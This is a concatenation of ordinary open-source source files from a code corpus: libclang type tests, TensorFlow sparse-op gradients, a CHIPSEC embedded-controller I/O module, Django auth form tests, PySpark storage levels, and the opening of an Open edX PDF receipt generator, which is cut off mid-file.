tu = get_tu('int i; void f();')
i = get_cursor(tu, 'i')
f = get_cursor(tu, 'f')
assert i is not None
assert f is not None
assert i.type.is_pod()
assert not f.type.is_pod()
def test_function_variadic():
"""Ensure Type.is_function_variadic works."""
source ="""
#include <stdarg.h>
void foo(int a, ...);
void bar(int a, int b);
"""
tu = get_tu(source)
foo = get_cursor(tu, 'foo')
bar = get_cursor(tu, 'bar')
assert foo is not None
assert bar is not None
assert isinstance(foo.type.is_function_variadic(), bool)
assert foo.type.is_function_variadic()
assert not bar.type.is_function_variadic()
def test_element_type():
"""Ensure Type.element_type works."""
tu = get_tu('int i[5];')
i = get_cursor(tu, 'i')
assert i is not None
assert i.type.kind == TypeKind.CONSTANTARRAY
assert i.type.element_type.kind == TypeKind.INT
@raises(Exception)
def test_invalid_element_type():
"""Ensure Type.element_type raises if type doesn't have elements."""
tu = get_tu('int i;')
i = get_cursor(tu, 'i')
assert i is not None
i.element_type
def test_element_count():
"""Ensure Type.element_count works."""
tu = get_tu('int i[5]; int j;')
i = get_cursor(tu, 'i')
j = get_cursor(tu, 'j')
assert i is not None
assert j is not None
assert i.type.element_count == 5
try:
j.type.element_count
assert False
except:
assert True
def test_is_volatile_qualified():
"""Ensure Type.is_volatile_qualified works."""
tu = get_tu('volatile int i = 4; int j = 2;')
i = get_cursor(tu, 'i')
j = get_cursor(tu, 'j')
assert i is not None
assert j is not None
assert isinstance(i.type.is_volatile_qualified(), bool)
assert i.type.is_volatile_qualified()
assert not j.type.is_volatile_qualified()
def test_is_restrict_qualified():
"""Ensure Type.is_restrict_qualified works."""
tu = get_tu('struct s { void * restrict i; void * j };')
i = get_cursor(tu, 'i')
j = get_cursor(tu, 'j')
assert i is not None
assert j is not None
assert isinstance(i.type.is_restrict_qualified(), bool)
assert i.type.is_restrict_qualified()
assert not j.type.is_restrict_qualified()
| bsd-2-clause |
a-doumoulakis/tensorflow | tensorflow/python/ops/sparse_grad.py | 61 | 10799 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Gradients for operators defined in sparse_ops.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_sparse_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import sparse_ops
# TODO(b/31222613): This op may be differentiable, and there may be
# latent bugs here.
ops.NotDifferentiable("SparseAddGrad")
ops.NotDifferentiable("SparseConcat")
ops.NotDifferentiable("SparseToDense")
@ops.RegisterGradient("SparseReorder")
def _SparseReorderGrad(op, unused_output_indices_grad, output_values_grad):
"""Gradients for the SparseReorder op.
Args:
op: the SparseReorder op
unused_output_indices_grad: the incoming gradients of the output indices
output_values_grad: the incoming gradients of the output values
Returns:
Gradient for each of the 3 input tensors:
(input_indices, input_values, input_shape)
The gradients for input_indices and input_shape is None.
"""
input_indices = op.inputs[0]
input_shape = op.inputs[2]
num_entries = array_ops.shape(input_indices)[0]
entry_indices = math_ops.range(num_entries)
sp_unordered = sparse_tensor.SparseTensor(
input_indices, entry_indices, input_shape)
sp_ordered = sparse_ops.sparse_reorder(sp_unordered)
inverted_permutation = array_ops.invert_permutation(sp_ordered.values)
return (None,
array_ops.gather(output_values_grad, inverted_permutation),
None)
@ops.RegisterGradient("SparseAdd")
def _SparseAddGrad(op, *grads):
"""The backward operator for the SparseAdd op.
The SparseAdd op calculates A + B, where A, B, and the sum are all represented
as `SparseTensor` objects. This op takes in the upstream gradient w.r.t.
non-empty values of the sum, and outputs the gradients w.r.t. the non-empty
values of A and B.
Args:
op: the SparseAdd op
*grads: the incoming gradients, one element per output of `op`
Returns:
Gradient for each of the 6 input tensors of SparseAdd:
(a_indices, a_values, a_shape, b_indices, b_values, b_shape, thresh)
The gradients for the indices, shapes, and the threshold are None.
"""
val_grad = grads[1]
a_indices = op.inputs[0]
b_indices = op.inputs[3]
sum_indices = op.outputs[0]
# NOTE: we do not need to take `thresh` into account, since it simply affects
# the non-zero elements of the sum, and we will peek into `sum_indices` in the
# gradient op.
# pylint: disable=protected-access
a_val_grad, b_val_grad = gen_sparse_ops._sparse_add_grad(val_grad, a_indices,
b_indices,
sum_indices)
a_val_grad.set_shape(op.inputs[1].get_shape())
b_val_grad.set_shape(op.inputs[4].get_shape())
# (a_indices, a_values, a_shape, b_indices, b_values, b_shape, thresh)
return (None, a_val_grad, None, None, b_val_grad, None, None)
@ops.RegisterGradient("SparseTensorDenseAdd")
def _SparseTensorDenseAddGrad(op, out_grad):
sp_indices = op.inputs[0]
# (sparse_indices, sparse_values, sparse_shape, dense)
return (None, array_ops.gather_nd(out_grad, sp_indices), None, out_grad)
@ops.RegisterGradient("SparseReduceSum")
def _SparseReduceSumGrad(op, out_grad):
"""Similar to gradient for the Sum Op (i.e. tf.reduce_sum())."""
sp_indices = op.inputs[0]
sp_shape = op.inputs[2]
output_shape_kept_dims = math_ops.reduced_shape(sp_shape, op.inputs[3])
out_grad_reshaped = array_ops.reshape(out_grad, output_shape_kept_dims)
scale = sp_shape // math_ops.to_int64(output_shape_kept_dims)
# (sparse_indices, sparse_values, sparse_shape, reduction_axes)
return (None, array_ops.gather_nd(out_grad_reshaped, sp_indices // scale),
None, None)
@ops.RegisterGradient("SparseTensorDenseMatMul")
def _SparseTensorDenseMatMulGrad(op, grad):
"""Gradients for the dense tensor in the SparseTensorDenseMatMul op.
If either input is complex, no gradient is provided.
Args:
op: the SparseTensorDenseMatMul op
grad: the incoming gradient
Returns:
Gradient for each of the 4 input tensors:
(sparse_indices, sparse_values, sparse_shape, dense_tensor)
The gradients for indices and shape are None.
Raises:
TypeError: When the two operands don't have the same type.
"""
a_indices, a_values, a_shape = op.inputs[:3]
b = op.inputs[3]
adj_a = op.get_attr("adjoint_a")
adj_b = op.get_attr("adjoint_b")
a_type = a_values.dtype.base_dtype
b_type = b.dtype.base_dtype
if a_type != b_type:
raise TypeError("SparseTensorDenseMatMul op received operands with "
"different types: ", a_type, " and ", b_type)
if a_type in (ops.dtypes.complex64, ops.dtypes.complex128):
raise NotImplementedError("SparseTensorDenseMatMul op does not support "
"complex gradients.")
# gradient w.r.t. dense
b_grad = gen_sparse_ops._sparse_tensor_dense_mat_mul( # pylint: disable=protected-access
a_indices, a_values, a_shape, grad, adjoint_a=not adj_a)
if adj_b:
b_grad = array_ops.transpose(b_grad)
# gradient w.r.t. sparse values
rows = a_indices[:, 0]
cols = a_indices[:, 1]
# TODO(zongheng, ebrevdo): add conjugates in the right places when complex
# values are allowed.
# TODO(zongheng): these gather calls could potentially duplicate rows/cols in
# memory. If there is a need, we should look into implementing this more
# intelligently to avoid duplicating data.
parts_a = array_ops.gather(grad, rows if not adj_a else cols)
parts_b = array_ops.gather(b if not adj_b else array_ops.transpose(b),
cols if not adj_a else rows)
a_values_grad = math_ops.reduce_sum(parts_a * parts_b, reduction_indices=1)
# gradients w.r.t. (a_indices, a_values, a_shape, b)
return (None, a_values_grad, None, b_grad)
@ops.RegisterGradient("SparseDenseCwiseAdd")
def _SparseDenseCwiseAddGrad(unused_op, unused_grad):
raise NotImplementedError("Gradient for SparseDenseCwiseAdd is currently not"
" implemented yet.")
def _SparseDenseCwiseMulOrDivGrad(op, grad, is_mul):
"""Common code for SparseDenseCwise{Mul,Div} gradients."""
x_indices = op.inputs[0]
x_shape = op.inputs[2]
y = op.inputs[3]
y_shape = math_ops.to_int64(array_ops.shape(y))
num_added_dims = array_ops.expand_dims(
array_ops.size(x_shape) - array_ops.size(y_shape), 0)
augmented_y_shape = array_ops.concat(
[array_ops.ones(num_added_dims, ops.dtypes.int64), y_shape], 0)
scaling = x_shape // augmented_y_shape
scaled_indices = x_indices // scaling
scaled_indices = array_ops.slice(scaled_indices,
array_ops.concat([[0], num_added_dims], 0),
[-1, -1])
dense_vals = array_ops.gather_nd(y, scaled_indices)
if is_mul:
dx = grad * dense_vals
dy_val = grad * op.inputs[1]
else:
dx = grad / dense_vals
dy_val = grad * (-op.inputs[1] / math_ops.square(dense_vals))
# indices can repeat after scaling, so we can't use sparse_to_dense().
dy = sparse_ops.sparse_add(
array_ops.zeros_like(y),
sparse_tensor.SparseTensor(scaled_indices, dy_val, y_shape))
# (sp_indices, sp_vals, sp_shape, dense)
return (None, dx, None, dy)
@ops.RegisterGradient("SparseDenseCwiseMul")
def _SparseDenseCwiseMulGrad(op, grad):
"""Gradients for SparseDenseCwiseMul."""
return _SparseDenseCwiseMulOrDivGrad(op, grad, True)
@ops.RegisterGradient("SparseDenseCwiseDiv")
def _SparseDenseCwiseDivGrad(op, grad):
"""Gradients for SparseDenseCwiseDiv."""
return _SparseDenseCwiseMulOrDivGrad(op, grad, False)
@ops.RegisterGradient("SparseSoftmax")
def _SparseSoftmaxGrad(op, grad):
"""Gradients for SparseSoftmax.
The calculation is the same as SoftmaxGrad:
grad_x = grad_softmax * softmax - sum(grad_softmax * softmax) * softmax
where we now only operate on the non-zero values present in the SparseTensors.
Args:
op: the SparseSoftmax op.
grad: the upstream gradient w.r.t. the non-zero SparseSoftmax output values.
Returns:
Gradients w.r.t. the input (sp_indices, sp_values, sp_shape).
"""
indices, shape = op.inputs[0], op.inputs[2]
out_vals = op.outputs[0]
sp_output = sparse_tensor.SparseTensor(indices, out_vals, shape)
sp_grad = sparse_tensor.SparseTensor(indices, grad, shape)
sp_product = sparse_tensor.SparseTensor(
indices, sp_output.values * sp_grad.values, shape)
# [..., B, 1], dense.
sum_reduced = -sparse_ops.sparse_reduce_sum(sp_product, [-1], keep_dims=True)
# sparse [..., B, C] + dense [..., B, 1] with broadcast; outputs sparse.
sp_sum = sparse_ops.sparse_dense_cwise_add(sp_grad, sum_reduced)
grad_x = sp_sum.values * sp_output.values
return [None, grad_x, None]
@ops.RegisterGradient("SparseSparseMaximum")
def _SparseSparseMaximumGrad(unused_op, unused_grad):
raise NotImplementedError("Gradient for SparseSparseMaximum is currently not"
" implemented yet.")
@ops.RegisterGradient("SparseSparseMinimum")
def _SparseSparseMinimumGrad(unused_op, unused_grad):
raise NotImplementedError("Gradient for SparseSparseMinimum is currently not"
" implemented yet.")
@ops.RegisterGradient("SparseFillEmptyRows")
def _SparseFillEmptyRowsGrad(op, unused_grad_output_indices, output_grad_values,
unused_grad_empty_row_indicator,
unused_grad_reverse_index_map):
"""Gradients for SparseFillEmptyRows."""
reverse_index_map = op.outputs[3]
# pylint: disable=protected-access
d_values, d_default_value = gen_sparse_ops._sparse_fill_empty_rows_grad(
reverse_index_map=reverse_index_map, grad_values=output_grad_values)
# d_indices, d_values, d_dense_shape, d_default_value.
return [None, d_values, None, d_default_value]
| apache-2.0 |
chipsecintel/chipsec | source/tool/chipsec/hal/ec.py | 3 | 6172 | #!/usr/local/bin/python
#CHIPSEC: Platform Security Assessment Framework
#Copyright (c) 2010-2016, Intel Corporation
#
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License
#as published by the Free Software Foundation; Version 2.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
#Contact information:
#[email protected]
#
# -------------------------------------------------------------------------------
#
# CHIPSEC: Platform Hardware Security Assessment Framework
#
# -------------------------------------------------------------------------------
"""
Access to Embedded Controller (EC)
Usage:
>>> write_command( command )
>>> write_data( data )
>>> read_data()
>>> read_memory( offset )
>>> write_memory( offset, data )
>>> read_memory_extended( word_offset )
>>> write_memory_extended( word_offset, data )
>>> read_range( start_offset, size )
>>> write_range( start_offset, buffer )
"""
from chipsec.logger import *
from chipsec.cfg.common import *
#
# Embedded Controller ACPI ports
#
IO_PORT_EC_DATA = 0x62
IO_PORT_EC_COMMAND = 0x66
IO_PORT_EC_STATUS = 0x66
IO_PORT_EC_INDEX = 0x380
IO_PORT_EC_INDEX_ADDRH = (IO_PORT_EC_INDEX + 0x1)
IO_PORT_EC_INDEX_ADDRL = (IO_PORT_EC_INDEX + 0x2)
IO_PORT_EC_INDEX_DATA = (IO_PORT_EC_INDEX + 0x3)
EC_STS_OBF = 0x01 # EC Output buffer full
EC_STS_IBF = 0x02 # EC Input buffer empty
#
# Embedded Controller ACPI commands
# These commands should be submitted to EC ACPI I/O ports
#
EC_COMMAND_ACPI_READ = 0x080 # Read EC ACPI memory
EC_COMMAND_ACPI_WRITE = 0x081 # Write EC ACPI memory
EC_COMMAND_ACPI_LOCK = 0x082 # Lock EC for burst use
EC_COMMAND_ACPI_UNLOCK = 0x083 # Unlock EC from burst use
EC_COMMAND_ACPI_QUERY = 0x084 # Query EC event
EC_COMMAND_ACPI_READ_EXT = 0x0F0 # Read EC ACPI extended memory
EC_COMMAND_ACPI_WRITE_EXT = 0x0F1 # Write EC ACPI extended memory
class EC:
def __init__( self, cs ):
self.cs = cs
#
# EC ACPI memory access
#
# Wait for EC input buffer empty
def _wait_ec_inbuf_empty( self ):
to = 1000
while (self.cs.io.read_port_byte(IO_PORT_EC_STATUS) & EC_STS_IBF) and to: to = to - 1
return True
# Wait for EC output buffer full
def _wait_ec_outbuf_full( self ):
to = 1000
while not ( self.cs.io.read_port_byte(IO_PORT_EC_STATUS) & EC_STS_OBF ) and to: to = to - 1
return True
def write_command( self, command ):
self._wait_ec_inbuf_empty()
return self.cs.io.write_port_byte( IO_PORT_EC_COMMAND, command )
def write_data( self, data ):
self._wait_ec_inbuf_empty()
return self.cs.io.write_port_byte( IO_PORT_EC_DATA, data )
def read_data( self ):
if not self._wait_ec_outbuf_full(): return None
return self.cs.io.read_port_byte( IO_PORT_EC_DATA )
def read_memory( self, offset ):
self.write_command( EC_COMMAND_ACPI_READ )
self.write_data( offset )
return self.read_data()
def write_memory( self, offset, data ):
self.write_command( EC_COMMAND_ACPI_WRITE )
self.write_data( offset )
return self.write_data( data )
def read_memory_extended( self, word_offset ):
self.write_command( EC_COMMAND_ACPI_READ )
self.write_data( 0x2 )
self.write_data( word_offset & 0xFF )
self.write_command( EC_COMMAND_ACPI_READ_EXT )
self.write_data( word_offset >> 8 )
return self.read_data()
def write_memory_extended( self, word_offset, data ):
self.write_command( EC_COMMAND_ACPI_WRITE )
self.write_data( 0x2 )
self.write_data( word_offset & 0xFF )
self.write_command( EC_COMMAND_ACPI_WRITE_EXT )
self.write_data( word_offset >> 8 )
return self.write_data( data )
def read_range( self, start_offset, size ):
buffer = [chr(0xFF)]*size
#self.write_command( EC_COMMAND_ACPI_READ )
for i in range (size):
#self.write_data( start_offset + i )
#buffer[i] = chr( self.read_data() )
if start_offset + i < 0x100:
buffer[i] = chr( self.read_memory( start_offset + i ) )
else:
buffer[i] = chr( self.read_memory_extended( start_offset + i ) )
if logger().VERBOSE:
logger().log( "[ec] read EC memory from offset %X size %X:" % (start_offset, size) )
print_buffer( buffer )
return buffer
def write_range( self, start_offset, buffer ):
size = len(buffer)
for i in range(size):
self.write_memory( start_offset + i, ord(buffer[i]) )
if logger().VERBOSE:
logger().log( "[ec] write EC memory to offset %X size %X:" % (start_offset, size) )
print_buffer( buffer )
return True
#
# EC Intex I/O access
#
def read_idx( self, offset ):
self.cs.io.write_port_byte( IO_PORT_EC_INDEX_ADDRL, offset & 0xFF )
self.cs.io.write_port_byte( IO_PORT_EC_INDEX_ADDRH, (offset>>8) & 0xFF )
value = self.cs.io.read_port_byte( IO_PORT_EC_INDEX_DATA )
if logger().HAL: logger().log( "[ec] index read: offset 0x%02X > 0x%02X:" % (offset, value) )
return value
def write_idx( self, offset, value ):
if logger().HAL: logger().log( "[ec] index write: offset 0x%02X < 0x%02X:" % (offset, value) )
self.cs.io.write_port_byte( IO_PORT_EC_INDEX_ADDRL, offset & 0xFF )
self.cs.io.write_port_byte( IO_PORT_EC_INDEX_ADDRH, (offset>>8) & 0xFF )
self.cs.io.write_port_byte( IO_PORT_EC_INDEX_DATA, value & 0xFF )
return True
| gpl-2.0 |
pwhelan/djshouts | django/contrib/auth/tests/forms.py | 97 | 9436 | from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm, AuthenticationForm, PasswordChangeForm, SetPasswordForm, UserChangeForm, PasswordResetForm
from django.db import connection
from django.test import TestCase
from django.utils import unittest
class UserCreationFormTest(TestCase):
fixtures = ['authtestdata.json']
def test_user_already_exists(self):
data = {
'username': 'testclient',
'password1': 'test123',
'password2': 'test123',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form["username"].errors,
[u'A user with that username already exists.'])
def test_invalid_data(self):
data = {
'username': 'jsmith!',
'password1': 'test123',
'password2': 'test123',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form["username"].errors,
[u'This value may contain only letters, numbers and @/./+/-/_ characters.'])
def test_password_verification(self):
# The verification password is incorrect.
data = {
'username': 'jsmith',
'password1': 'test123',
'password2': 'test',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form["password2"].errors,
[u"The two password fields didn't match."])
def test_both_passwords(self):
# One (or both) passwords weren't given
data = {'username': 'jsmith'}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form['password1'].errors,
[u'This field is required.'])
self.assertEqual(form['password2'].errors,
[u'This field is required.'])
data['password2'] = 'test123'
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form['password1'].errors,
[u'This field is required.'])
def test_success(self):
# The success case.
data = {
'username': '[email protected]',
'password1': 'test123',
'password2': 'test123',
}
form = UserCreationForm(data)
self.assertTrue(form.is_valid())
u = form.save()
self.assertEqual(repr(u), '<User: [email protected]>')
class AuthenticationFormTest(TestCase):
fixtures = ['authtestdata.json']
def test_invalid_username(self):
# The user submits an invalid username.
data = {
'username': 'jsmith_does_not_exist',
'password': 'test123',
}
form = AuthenticationForm(None, data)
self.assertFalse(form.is_valid())
self.assertEqual(form.non_field_errors(),
[u'Please enter a correct username and password. Note that both fields are case-sensitive.'])
def test_inactive_user(self):
# The user is inactive.
data = {
'username': 'inactive',
'password': 'password',
}
form = AuthenticationForm(None, data)
self.assertFalse(form.is_valid())
self.assertEqual(form.non_field_errors(),
[u'This account is inactive.'])
def test_success(self):
# The success case
data = {
'username': 'testclient',
'password': 'password',
}
form = AuthenticationForm(None, data)
self.assertTrue(form.is_valid())
self.assertEqual(form.non_field_errors(), [])
class SetPasswordFormTest(TestCase):
fixtures = ['authtestdata.json']
def test_password_verification(self):
# The two new passwords do not match.
user = User.objects.get(username='testclient')
data = {
'new_password1': 'abc123',
'new_password2': 'abc',
}
form = SetPasswordForm(user, data)
self.assertFalse(form.is_valid())
self.assertEqual(form["new_password2"].errors,
[u"The two password fields didn't match."])
def test_success(self):
user = User.objects.get(username='testclient')
data = {
'new_password1': 'abc123',
'new_password2': 'abc123',
}
form = SetPasswordForm(user, data)
self.assertTrue(form.is_valid())
class PasswordChangeFormTest(TestCase):
fixtures = ['authtestdata.json']
def test_incorrect_password(self):
user = User.objects.get(username='testclient')
data = {
'old_password': 'test',
'new_password1': 'abc123',
'new_password2': 'abc123',
}
form = PasswordChangeForm(user, data)
self.assertFalse(form.is_valid())
self.assertEqual(form["old_password"].errors,
[u'Your old password was entered incorrectly. Please enter it again.'])
def test_password_verification(self):
# The two new passwords do not match.
user = User.objects.get(username='testclient')
data = {
'old_password': 'password',
'new_password1': 'abc123',
'new_password2': 'abc',
}
form = PasswordChangeForm(user, data)
self.assertFalse(form.is_valid())
self.assertEqual(form["new_password2"].errors,
[u"The two password fields didn't match."])
def test_success(self):
# The success case.
user = User.objects.get(username='testclient')
data = {
'old_password': 'password',
'new_password1': 'abc123',
'new_password2': 'abc123',
}
form = PasswordChangeForm(user, data)
self.assertTrue(form.is_valid())
def test_field_order(self):
# Regression test - check the order of fields:
user = User.objects.get(username='testclient')
self.assertEqual(PasswordChangeForm(user, {}).fields.keys(),
['old_password', 'new_password1', 'new_password2'])
class UserChangeFormTest(TestCase):
fixtures = ['authtestdata.json']
@unittest.skipIf(not connection.features.supports_joins, 'Requires JOIN support')
def test_username_validity(self):
user = User.objects.get(username='testclient')
data = {'username': 'not valid'}
form = UserChangeForm(data, instance=user)
self.assertFalse(form.is_valid())
self.assertEqual(form['username'].errors,
[u'This value may contain only letters, numbers and @/./+/-/_ characters.'])
def test_bug_14242(self):
# A regression test, introduce by adding an optimization for the
# UserChangeForm.
class MyUserForm(UserChangeForm):
def __init__(self, *args, **kwargs):
super(MyUserForm, self).__init__(*args, **kwargs)
self.fields['groups'].help_text = 'These groups give users different permissions'
class Meta(UserChangeForm.Meta):
fields = ('groups',)
# Just check we can create it
form = MyUserForm({})
class PasswordResetFormTest(TestCase):
fixtures = ['authtestdata.json']
def create_dummy_user(self):
"""creates a user and returns a tuple
(user_object, username, email)
"""
username = 'jsmith'
email = '[email protected]'
user = User.objects.create_user(username, email, 'test123')
return (user, username, email)
def test_invalid_email(self):
data = {'email':'not valid'}
form = PasswordResetForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form['email'].errors,
[u'Enter a valid e-mail address.'])
def test_nonexistant_email(self):
# Test nonexistant email address
data = {'email':'[email protected]'}
form = PasswordResetForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form.errors,
{'email': [u"That e-mail address doesn't have an associated user account. Are you sure you've registered?"]})
def test_cleaned_data(self):
# Regression test
(user, username, email) = self.create_dummy_user()
data = {'email': email}
form = PasswordResetForm(data)
self.assertTrue(form.is_valid())
self.assertEqual(form.cleaned_data['email'], email)
def test_bug_5605(self):
# bug #5605, preserve the case of the user name (before the @ in the
# email address) when creating a user.
user = User.objects.create_user('forms_test2', '[email protected]', 'test')
self.assertEqual(user.email, '[email protected]')
user = User.objects.create_user('forms_test3', 'tesT', 'test')
self.assertEqual(user.email, 'tesT')
def test_inactive_user(self):
#tests that inactive user cannot
#receive password reset email
(user, username, email) = self.create_dummy_user()
user.is_active = False
user.save()
form = PasswordResetForm({'email': email})
self.assertFalse(form.is_valid())
| bsd-3-clause |
ConeyLiu/spark | python/pyspark/storagelevel.py | 32 | 2640 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
__all__ = ["StorageLevel"]
class StorageLevel(object):
"""
Flags for controlling the storage of an RDD. Each StorageLevel records whether to use memory,
whether to drop the RDD to disk if it falls out of memory, whether to keep the data in memory
in a JAVA-specific serialized format, and whether to replicate the RDD partitions on multiple
nodes. Also contains static constants for some commonly used storage levels, MEMORY_ONLY.
Since the data is always serialized on the Python side, all the constants use the serialized
formats.
"""
def __init__(self, useDisk, useMemory, useOffHeap, deserialized, replication=1):
self.useDisk = useDisk
self.useMemory = useMemory
self.useOffHeap = useOffHeap
self.deserialized = deserialized
self.replication = replication
def __repr__(self):
return "StorageLevel(%s, %s, %s, %s, %s)" % (
self.useDisk, self.useMemory, self.useOffHeap, self.deserialized, self.replication)
def __str__(self):
result = ""
result += "Disk " if self.useDisk else ""
result += "Memory " if self.useMemory else ""
result += "OffHeap " if self.useOffHeap else ""
result += "Deserialized " if self.deserialized else "Serialized "
result += "%sx Replicated" % self.replication
return result
StorageLevel.DISK_ONLY = StorageLevel(True, False, False, False)
StorageLevel.DISK_ONLY_2 = StorageLevel(True, False, False, False, 2)
StorageLevel.MEMORY_ONLY = StorageLevel(False, True, False, False)
StorageLevel.MEMORY_ONLY_2 = StorageLevel(False, True, False, False, 2)
StorageLevel.MEMORY_AND_DISK = StorageLevel(True, True, False, False)
StorageLevel.MEMORY_AND_DISK_2 = StorageLevel(True, True, False, False, 2)
StorageLevel.OFF_HEAP = StorageLevel(True, True, True, False, 1)
| apache-2.0 |
angelapper/edx-platform | lms/djangoapps/shoppingcart/pdf.py | 22 | 18645 | """
Template for PDF Receipt/Invoice Generation
"""
import logging
from django.conf import settings
from django.utils.translation import ugettext as _
from PIL import Image
from reportlab.lib import colors
from reportlab.lib.pagesizes import letter
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.lib.units import mm
from reportlab.pdfgen.canvas import Canvas
from reportlab.platypus import Paragraph
from reportlab.platypus.tables import Table, TableStyle
from openedx.core.djangoapps.site_configuration import helpers as configuration_helpers
from xmodule.modulestore.django import ModuleI18nService
log = logging.getLogger("PDF Generation")
class NumberedCanvas(Canvas):
"""
Canvas child class with auto page-numbering.
"""
def __init__(self, *args, **kwargs):
"""
__init__
"""
Canvas.__init__(self, *args, **kwargs)
self._saved_page_states = []
def insert_page_break(self):
"""
Starts a new page.
"""
self._saved_page_states.append(dict(self.__dict__))
self._startPage()
def current_page_count(self):
"""
Returns the page count in the current pdf document.
"""
return len(self._saved_page_states) + 1
def save(self):
"""
Adds page numbering to each page (page x of y)
"""
num_pages = len(self._saved_page_states)
for state in self._saved_page_states:
self.__dict__.update(state)
if num_pages > 1:
self.draw_page_number(num_pages)
Canvas.showPage(self)
Canvas.save(self)
def draw_page_number(self, page_count):
"""
Draws the String "Page x of y" at the bottom right of the document.
"""
self.setFontSize(7)
self.drawRightString(
200 * mm,
12 * mm,
_("Page {page_number} of {page_count}").format(page_number=self._pageNumber, page_count=page_count)
)
class PDFInvoice(object):
"""
PDF Generation Class
"""
def __init__(self, items_data, item_id, date, is_invoice, total_cost, payment_received, balance):
"""
Accepts the following positional arguments
items_data - A list having the following items for each row.
item_description - String
quantity - Integer
list_price - float
discount - float
item_total - float
id - String
date - datetime
is_invoice - boolean - True (for invoice) or False (for Receipt)
total_cost - float
payment_received - float
balance - float
"""
# From settings
self.currency = settings.PAID_COURSE_REGISTRATION_CURRENCY[1]
self.logo_path = configuration_helpers.get_value("PDF_RECEIPT_LOGO_PATH", settings.PDF_RECEIPT_LOGO_PATH)
self.cobrand_logo_path = configuration_helpers.get_value(
"PDF_RECEIPT_COBRAND_LOGO_PATH", settings.PDF_RECEIPT_COBRAND_LOGO_PATH
)
self.tax_label = configuration_helpers.get_value("PDF_RECEIPT_TAX_ID_LABEL", settings.PDF_RECEIPT_TAX_ID_LABEL)
self.tax_id = configuration_helpers.get_value("PDF_RECEIPT_TAX_ID", settings.PDF_RECEIPT_TAX_ID)
self.footer_text = configuration_helpers.get_value("PDF_RECEIPT_FOOTER_TEXT", settings.PDF_RECEIPT_FOOTER_TEXT)
self.disclaimer_text = configuration_helpers.get_value(
"PDF_RECEIPT_DISCLAIMER_TEXT", settings.PDF_RECEIPT_DISCLAIMER_TEXT,
)
self.billing_address_text = configuration_helpers.get_value(
"PDF_RECEIPT_BILLING_ADDRESS", settings.PDF_RECEIPT_BILLING_ADDRESS
)
self.terms_conditions_text = configuration_helpers.get_value(
"PDF_RECEIPT_TERMS_AND_CONDITIONS", settings.PDF_RECEIPT_TERMS_AND_CONDITIONS
)
self.brand_logo_height = configuration_helpers.get_value(
"PDF_RECEIPT_LOGO_HEIGHT_MM", settings.PDF_RECEIPT_LOGO_HEIGHT_MM
) * mm
self.cobrand_logo_height = configuration_helpers.get_value(
"PDF_RECEIPT_COBRAND_LOGO_HEIGHT_MM", settings.PDF_RECEIPT_COBRAND_LOGO_HEIGHT_MM
) * mm
# From Context
self.items_data = items_data
self.item_id = item_id
self.date = ModuleI18nService().strftime(date, 'SHORT_DATE')
self.is_invoice = is_invoice
self.total_cost = '{currency}{amount:.2f}'.format(currency=self.currency, amount=total_cost)
self.payment_received = '{currency}{amount:.2f}'.format(currency=self.currency, amount=payment_received)
self.balance = '{currency}{amount:.2f}'.format(currency=self.currency, amount=balance)
# initialize the pdf variables
self.margin = 15 * mm
self.page_width = letter[0]
self.page_height = letter[1]
self.min_clearance = 3 * mm
self.second_page_available_height = ''
self.second_page_start_y_pos = ''
self.first_page_available_height = ''
self.pdf = None
def is_on_first_page(self):
"""
Returns True if it's the first page of the pdf, False otherwise.
"""
return self.pdf.current_page_count() == 1
def generate_pdf(self, file_buffer):
"""
Takes in a buffer and puts the generated pdf into that buffer.
"""
self.pdf = NumberedCanvas(file_buffer, pagesize=letter)
self.draw_border()
y_pos = self.draw_logos()
self.second_page_available_height = y_pos - self.margin - self.min_clearance
self.second_page_start_y_pos = y_pos
y_pos = self.draw_title(y_pos)
self.first_page_available_height = y_pos - self.margin - self.min_clearance
y_pos = self.draw_course_info(y_pos)
y_pos = self.draw_totals(y_pos)
self.draw_footer(y_pos)
self.pdf.insert_page_break()
self.pdf.save()
def draw_border(self):
"""
Draws a big border around the page leaving a margin of 15 mm on each side.
"""
self.pdf.setStrokeColorRGB(0.5, 0.5, 0.5)
self.pdf.setLineWidth(0.353 * mm)
self.pdf.rect(self.margin, self.margin,
self.page_width - (self.margin * 2), self.page_height - (self.margin * 2),
stroke=True, fill=False)
@staticmethod
def load_image(img_path):
"""
Loads an image given a path. An absolute path is assumed.
